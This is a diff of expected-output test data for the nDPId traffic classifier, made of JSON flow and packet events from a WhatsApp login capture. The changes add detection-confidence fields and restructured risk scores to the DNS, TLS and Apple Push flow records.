 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1432582225533,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1432582225533,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAooItAAEAGYbXAqAIEEaxkN8ANAbtmBk0CJP5uKFAQ\/\/9vTQAA"}
 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":47,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582227526,"flow_last_seen":1432582227526,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1432582227526,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"192.168.2.1","src_port":51897,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1432582227526,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"ts_msec":1432582227526,"pkt":"xiwDYGpkAPS5Jrv0CABFAABBdxsAAEARfjvAqAIEwKgCAcq5ADUALb4mNPgBAAABAAAAAAAABXF1ZXJ5A2VzcwVhcHBsZQNjb20AAAEAAQ=="}
-00744{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":47,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582227526,"flow_last_seen":1432582227526,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1432582227526,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"192.168.2.1","src_port":51897,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"query.ess.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":47,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582227526,"flow_last_seen":1432582227526,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1432582227526,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"192.168.2.1","src_port":51897,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"query.ess.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00721{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1432582227594,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":251,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":251,"pkt_l4_len":217,"ts_msec":1432582227594,"pkt":"APS5Jrv0xiwDYGpkCABFAADtqMoAAEARS+DAqAIBwKgCBAA1yrkA2SFYNPiBgAABAAkAAAAABXF1ZXJ5A2VzcwVhcHBsZQNjb20AAAEAAcAMAAUAAQAASFYAIAVxdWVyeQllc3MtYXBwbGUDY29tBmFrYWRucwNuZXQAwDEAAQABAAAAOwAEEbJoDMAxAAEAAQAAADsABBGyaA7AMQABAAEAAAA7AAQRsmgnwDEAAQABAAAAOwAEEbJoJsAxAAEAAQAAADsABBGyaA3AMQABAAEAAAA7AAQRsmgPwDEAAQABAAAAOwAEEbJoC8AxAAEAAQAAADsABBGyaBA="}
-00761{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":48,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1432582227526,"flow_last_seen":1432582227594,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":246,"flow_avg_l4_payload_len":123,"midstream":0,"ts_msec":1432582227594,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"192.168.2.1","src_port":51897,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"query.ess.apple.com","num_queries":1,"num_answers":9,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.178.104.12"}}
+00787{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":48,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1432582227526,"flow_last_seen":1432582227594,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":246,"flow_avg_l4_payload_len":123,"midstream":0,"ts_msec":1432582227594,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"192.168.2.1","src_port":51897,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"query.ess.apple.com","num_queries":1,"num_answers":9,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.178.104.12"}}
 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":49,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582227595,"flow_last_seen":1432582227595,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1432582227595,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"192.168.2.1","src_port":52190,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1432582227595,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"ts_msec":1432582227595,"pkt":"xiwDYGpkAPS5Jrv0CABFAAA+I5EAAEAR0cjAqAIEwKgCAcveADUAKv\/L36MBAAABAAAAAAAAA2UxMwh3aGF0c2FwcANuZXQAAAEAAQ=="}
-00751{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":49,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582227595,"flow_last_seen":1432582227595,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1432582227595,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"192.168.2.1","src_port":52190,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.WhatsApp","breed":"Acceptable","category":"Chat"},"dns": {"query":"e13.whatsapp.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00777{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":49,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582227595,"flow_last_seen":1432582227595,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1432582227595,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"192.168.2.1","src_port":52190,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.WhatsApp","breed":"Acceptable","category":"Chat"},"dns": {"query":"e13.whatsapp.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":50,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582227604,"flow_last_seen":1432582227604,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1432582227604,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.178.104.12","src_port":49201,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1432582227604,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1432582227604,"pkt":"xiwDYGpkAPS5Jrv0CABFAABAZF5AAEAGme\/AqAIEEbJoDMAxAbvjm5\/WAAAAALAC\/\/9XjAAAAgQFtAEDAwQBAQgKLfovrgAAAAAEAgAA"}
 00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1432582227624,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":204,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":204,"pkt_l4_len":170,"ts_msec":1432582227624,"pkt":"APS5Jrv0xiwDYGpkCABFAAC+d\/oAAEARfN\/AqAIBwKgCBAA1y94AqhSs36OBgAABAAgAAAAAA2UxMwh3aGF0c2FwcANuZXQAAAEAAcAMAAEAAQAAC20ABJ5V6TTADAABAAEAAAttAASeVTpKwAwAAQABAAALbQAEuK2zJ8AMAAEAAQAAC20ABJ5VOnfADAABAAEAAAttAAS4rbMlwAwAAQABAAALbQAEnlU6M8AMAAEAAQAAC20ABK4k0i3ADAABAAEAAAttAASeVQXI"}
-00767{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":51,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1432582227595,"flow_last_seen":1432582227624,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":162,"flow_tot_l4_payload_len":196,"flow_avg_l4_payload_len":98,"midstream":0,"ts_msec":1432582227624,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"192.168.2.1","src_port":52190,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.WhatsApp","breed":"Acceptable","category":"Chat"},"dns": {"query":"e13.whatsapp.net","num_queries":1,"num_answers":8,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"158.85.233.52"}}
+00793{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":51,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1432582227595,"flow_last_seen":1432582227624,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":162,"flow_tot_l4_payload_len":196,"flow_avg_l4_payload_len":98,"midstream":0,"ts_msec":1432582227624,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"192.168.2.1","src_port":52190,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.WhatsApp","breed":"Acceptable","category":"Chat"},"dns": {"query":"e13.whatsapp.net","num_queries":1,"num_answers":8,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"158.85.233.52"}}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":52,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582227643,"flow_last_seen":1432582227643,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1432582227643,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"184.173.179.37","src_port":49202,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":52,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1432582227643,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1432582227643,"pkt":"xiwDYGpkAPS5Jrv0CABFAABACXVAAEAGAsTAqAIEuK2zJcAyFGaCPuKZAAAAALAC\/\/9xPwAAAgQFtAEDAwQBAQgKLfov1AAAAAAEAgAA"}
 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1432582227797,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1432582227797,"pkt":"APS5Jrv0xiwDYGpkCABFAAA8rYsAADQGqrG4rbMlwKgCBBRmwDLYm8Xcgj7imqAS\/\/9JMQAAAgQFrAEDAwkEAggKD\/GKmy36L9Q="}
@@ -59,22 +59,22 @@
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1432582227885,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1432582227885,"pkt":"xiwDYGpkAPS5Jrv0CABFAAA0779AAEAGHIXAqAIEuK2zJcAyFGaCPuKa2JvF3YAQIFhWrQAAAQEICi36MMYP8Yqb"}
 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1432582227886,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1432582227886,"pkt":"APS5Jrv0xiwDYGpkCABFAAA0rZoAAO4G4r4RsmgMwKgCBAG7wDE71dh745uf14ASH\/64\/gAAAgQFoAEDAwQBAQQC"}
 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1432582227887,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1432582227887,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAo79dAAEAGDo7AqAIEEbJoDMAxAbvjm5\/XO9XYfFAQQADZtwAA"}
-00856{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":58,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432582227604,"flow_last_seen":1432582227896,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":190,"flow_tot_l4_payload_len":190,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1432582227896,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.178.104.12","src_port":49201,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"query.ess.apple.com","ja3":"799135475da362592a4be9199d258726","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+00962{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":58,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432582227604,"flow_last_seen":1432582227896,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":190,"flow_tot_l4_payload_len":190,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1432582227896,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.178.104.12","src_port":49201,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"query.ess.apple.com","ja3":"799135475da362592a4be9199d258726","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":60,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1432582228152,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1432582228152,"pkt":"APS5Jrv0xiwDYGpkCABFAAA0UDkAAO4GQB4RsmgOwKgCBAG7wDON4auhp3wzpIASH\/48GwAAAgQFoAEDAwQBAQQC"}
 00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1432582228167,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1432582228167,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAoC8AAAEAGMqTAqAIEEbJoDsAzAbunfDOkAAAAAFAEAADWZAAA"}
-01178{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":64,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1432582227604,"flow_last_seen":1432582228181,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3601,"flow_avg_l4_payload_len":514,"midstream":0,"ts_msec":1432582228181,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.178.104.12","src_port":49201,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"query.ess.apple.com","server_names":"*.ess.apple.com","ja3":"799135475da362592a4be9199d258726","ja3s":"c253ec3ad88e42f8da4032682892f9a0","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5","issuerDN":"CN=Apple Server Authentication CA, OU=Certification Authority, O=Apple Inc., C=US","subjectDN":"CN=*.ess.apple.com, OU=ISG Delivery Ops, O=Apple Inc., C=US","fingerprint":"BD:E0:62:C3:F2:9D:09:5D:52:D4:AA:60:11:1B:36:1B:03:24:F1:9B"}}
+01284{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":64,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1432582227604,"flow_last_seen":1432582228181,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3601,"flow_avg_l4_payload_len":514,"midstream":0,"ts_msec":1432582228181,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.178.104.12","src_port":49201,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"query.ess.apple.com","server_names":"*.ess.apple.com","ja3":"799135475da362592a4be9199d258726","ja3s":"c253ec3ad88e42f8da4032682892f9a0","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5","issuerDN":"CN=Apple Server Authentication CA, OU=Certification Authority, O=Apple Inc., C=US","subjectDN":"CN=*.ess.apple.com, OU=ISG Delivery Ops, O=Apple Inc., C=US","fingerprint":"BD:E0:62:C3:F2:9D:09:5D:52:D4:AA:60:11:1B:36:1B:03:24:F1:9B"}}
 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":72,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582228503,"flow_last_seen":1432582228503,"flow_idle_time":7440000,"flow_min_l4_payload_len":1440,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1440,"flow_avg_l4_payload_len":1440,"midstream":1,"ts_msec":1432582228503,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.110.229.14","src_port":49193,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 02425{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":72,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1432582228503,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"ts_msec":1432582228503,"pkt":"xiwDYGpkAPS5Jrv0CABFAAXUnXJAAEAG3ojAqAIEEW7lDsApFGe4aEuG1IsaTIAQIAA3PgAAAQEICi36MxJvhmvfFwMBACDgnfLWgV8g\/pw7jjX\/\/3ZDH1tB+gK1jE9k\/rmu6RmKPhcDAQdQwvKiQZwynx6ML8uHDg8WgbZIBNPdSiBPAiHm7VZMSxjHJ7BGJ8hRCNCOXC6LyliytHBkvL\/WQAE0iyMMgIlOMed9vHW1FQrPwtxifubqT35jWP9Nwm9hOQ2sUXPF6J6ZcqeRRxjts4LAxUp+ZVHbqO88UycvtArFRoKmsjwuTsOHFL0h\/BX9z3nWEUxaS9mVyhudzOuBlhf3aNgcppeJ3Mr6DsSPYDWrJ1Ko6GUQ6Mz7WhKyRp+OhCR+8vNcJ+2CIpa9aPiStGZvZFFuJ5eoJiBK6lrgPDyxxPa\/Z82Zx7iZHY+\/ajmPTXvQU4j7rC5OlL\/ZO1JkHVVmXmK1\/n5cUDYPvmxuWKEEWDx8eNxgRC58OMj0i5sHQHDG+ZLwIW4R3Ebyfp++7DjTwhy7uHM9lVzOAa6qgVVbeWZWLm5Zp4udgSHyIGs6plbNOhN8Lb7TTV3BFKBjCbwxtnCR+8lPTlOVAewtoM48Z0qRSJODl9LDmyJOnkTl+LQlbM7hWhZq\/VVyYDivHB+RnYZFdt7ZvWbMsFi9dXD6LjMsdLkj0RU\/SFA5gXvUGWy9x04Yo\/WqRH7ng0WIs\/oAxdVKAH0RL\/egfgAwRrcRgu3dPMqb8b19+PmNfa+WFGFnW0JLuexKCM9POmeD5yw6nk\/ac9Raq2rKcykqXxndrastmOjTbplC4qeRqr0LASV9tRAtG4WvYwC\/dfTiBawq859mBNGrglJvult9KPMKQPFULDG6x+KBv4eYpxjRc54qoabZQMWqqc+\/C0Emvy+eYJXsquvu+83ilyZ2N5sYlJ92HKH8JfE8JTIg5o3c9zLm5ZWhw8+NmQMwd0i5bU9vg06cROWuAG\/JN1YaR0pdUTITubm5mlduwzPQc2BVmXII2GZu105+s7qlJpQzMmRVjoqYtbOeWHJKIQ4UQdZCqzpz4AcWUN7LNHzsfvI5B8mXgc+B7aL8Y8jc2YqBmFk1dHfnjKeYCxGmRBZHJy7WbY9uViabjXvTq6pmYIGh+8lsYGwBwhWNapwWuc8Bw0b65ZKVGVcMKolOabscbWi+EYPJjuvFKgqZscrMC1dXZUtfdGPsPdXUlxbBMQ2Kup7KMqRXjqDlL2rJPpRC\/J6FfjQ+IKNfM\/RVAKV8teQWPRPthAH1FIrtEy51cDQixMgza8uftMRBKRfqEYXF7XVD5164o\/Mck2RudrQlyQmifMkcXuuW1kb2sTQoTz3p0Ox09YvEjxH+5SXf2MqAQ5cwiqd8fGHwSVuprE4y5B+B+0nEsRucTP\/97X6ZaOAcSRCuPQgdHN1NHCSQ8002IEFsPCRXQaWhb\/8KMjfJXXs1I3Eouoy5fGg9Eon7zV6InzJDOtmcVxRzUBgfDR1DGBIMOusKSnnAX1htfNBhCsM31KRySVA9BnU7p8tKS\/3BfJCTQQBoGTP2MoOxAiFKkSgXEh3w0kC\/x4kpimxmzxtGXOOQBZWNBgxyNTYgb0Sf9nOE+sqmGbSG7xueIM5u7Dd864xcMPmVsE1VcOkz2PMHbXIHe+roLyX2aqyb6Yu22cChJiPbSlY+mRr9siD+E7u3KnznXJcpEJBSd3utMm4QryOQBR9FCdalU2IyjVmAb148IpK6Ghgjmw7oVrHdCZXaVw+zfL1FhqC9Bd1VFHiBGm211UlGgrjedJW7mv5NM2z0cPLUMCaZycFw6G4KQN6aDAE1rL1eqhrIxxsuhCw0HsrKiJLLdGsa1+3Rf\/uEKt1c0Ng9dAzkrCJEwEwHx3trkLyhj9\/ja7mEqYBSp5Sx0mCtwBbfi6wnI8gTgb3WlgH0Ha3ke8bRCbeKw4dCUR0GSPUQYm4lO6VKKERImy3aoUDOHbtquSKZKUtb1hVt"}
-00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":72,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582228503,"flow_last_seen":1432582228503,"flow_idle_time":7440000,"flow_min_l4_payload_len":1440,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1440,"flow_avg_l4_payload_len":1440,"midstream":1,"ts_msec":1432582228503,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.110.229.14","src_port":49193,"dst_port":5223,"l4_proto":"tcp","ndpi": {"proto":"ApplePush.Apple","breed":"Safe","category":"Cloud"}}
+00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":72,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582228503,"flow_last_seen":1432582228503,"flow_idle_time":7440000,"flow_min_l4_payload_len":1440,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1440,"flow_avg_l4_payload_len":1440,"midstream":1,"ts_msec":1432582228503,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.110.229.14","src_port":49193,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"ApplePush","breed":"Acceptable","category":"Cloud"}}
